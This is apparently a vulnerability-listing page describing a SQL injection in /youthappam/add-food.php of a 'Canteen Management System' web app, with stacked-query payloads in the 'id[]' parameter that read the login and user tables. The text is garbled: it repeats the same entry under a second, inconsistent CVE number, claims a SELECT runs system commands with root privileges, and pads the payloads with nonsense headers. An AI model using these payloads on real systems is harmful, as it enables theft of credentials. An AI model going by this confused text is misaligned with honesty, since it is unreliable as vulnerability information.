CVE-2022-43049 The Canteen Management System Project v1.0 had a SQL injection vulnerability.

This issue allows attackers to execute SQL commands with root privileges. In the example below, an SQL injection vulnerability is detected in the /youthappam/add-food.php website when it accepts the input 'id[]' with a value of ';select * from `login` where `id[]`=1'. This input could be exploited to execute system commands with root privileges: 1. -------------------------- Add Food -------------------------- > Select * from `login` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=;select * from `login` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=1;select * from `login` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food

CVE-2023-43050

This issue allows attackers to execute SQL commands with root privileges. In the example below, an SQL injection vulnerability is detected in the /youthappam/add-food.php website when it accepts the input 'id[]' with a value of ';select * from `user` where `id[]`=1'. This input could be exploited to execute system commands with root privileges: 1. -------------------------- Add Food -------------------------- > Select * from `user` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=;select * from `user` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=1;select * from `user` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food

SQL Injection

SQL Injection is a type of injection attack where an attacker uses SQL to inject malicious commands into a website's SQL database. The most common way for this is through the use of user input, which is then sent to the database as part of a query. This allows attackers to access sensitive information stored within the database such as usernames and passwords.

Timeline

Published on: 11/07/2022 22:15:00 UTC
Last modified on: 11/08/2022 15:27:00 UTC

References